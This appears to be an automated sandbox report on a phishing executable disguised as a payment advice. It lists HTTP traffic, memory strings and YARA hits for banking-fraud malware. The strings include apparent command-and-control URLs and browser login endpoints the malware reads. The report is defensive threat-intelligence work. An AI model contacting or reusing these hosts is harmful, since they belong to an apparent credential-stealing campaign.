                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:25 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:28 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:31 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:50:33 GMTContent-Type: text/htmlContent-Length: 7931Connection: closeSet-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/ETag: "67516c07-1efb"Server: Anti-CDNData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 44 4e 4e e7 b3 bb e7 bb 9f 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 43 68 72 6f 6d 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 63 73 73 20 72 65 73 65 74 20 73 74 61 72 74 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 64 69 76 2c 20 73 70 61 6e 2c 20 61 70 70 6c 65 74 2c 20 6f 62 6a 65 63 74 2c 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 2c 20 70 2c 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 20 70 72 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 2c 20 61 62 62 72 2c 20 61 63 72 6f 6e 79 6d 2c 20 61 64 64 72 65 73 73 2c 20 62 69 67 2c 20 63 69 74 65 2c 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 65 6c 2c 20 64 66 6e 2c 20 65 6d 2c 20 69 6d 67 2c 20 69 6e 73 2c 20 6b 62 64 2c 20 71 2c 20 73 2c 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 6d 61 6c 6c 2c 20 73 74 72 69 6b 65 2c 20 73 74 72 6f 6e 67 2c 20 73 75 62 2c 20 73 75 70 2c 20 74 74 2c 20 76 61 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 2c 20 75 2c 20 69 2c 20 63 65 6e 74 65 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6c 2c 20 64 74 2c 20 64 64 2c 20 6f 6c 2c 20 75 6c 2c 20 6c 69 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 2c 20 66 6f 72 6d 2c 20 6c 61 62 65 6c 2c 20 6c 65 67 65 6e 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 62 6c 65 2c 20 63 61 70 74 69 6f 6e 2c 20 74 62 6f 64 79 2c 20 74 66 6f 6f 74 2c 20 74 68 65 61 64 2c 20 74 72 2c 20 74 68 2c 20 74 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 63 61 6e 76 61 73 2c 20 64 65 74 61 69 6c 73 2c 20 65 6d 62 65 64 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 67 75 72 65 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 6f 75 74 70 75 74 2c 20 72 75 62 79 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61
                Source: finger.exe, 00000009.00000002.3553337559.0000000004D40000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.00000000042D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeString found in binary or memory: http://localhost/calculator_server/requests.php
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1867220338.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552365141.000000000153E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.emirates-visa.net
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552365141.000000000153E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.emirates-visa.net/6wmy/
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
                Source: finger.exe, 00000009.00000002.3551915780.0000000003498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000009.00000002.3551915780.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000009.00000002.3551915780.0000000003498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000009.00000002.3551915780.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: finger.exe, 00000009.00000002.3551915780.0000000003498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 00000009.00000002.3551915780.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 00000009.00000003.2416542172.00000000081A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/5885/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0042CD93 NtClose,4_2_0042CD93
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2B60 NtClose,LdrInitializeThunk,4_2_016E2B60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_016E2DF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_016E2C70
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E35C0 NtCreateMutant,LdrInitializeThunk,4_2_016E35C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E4340 NtSetContextThread,4_2_016E4340
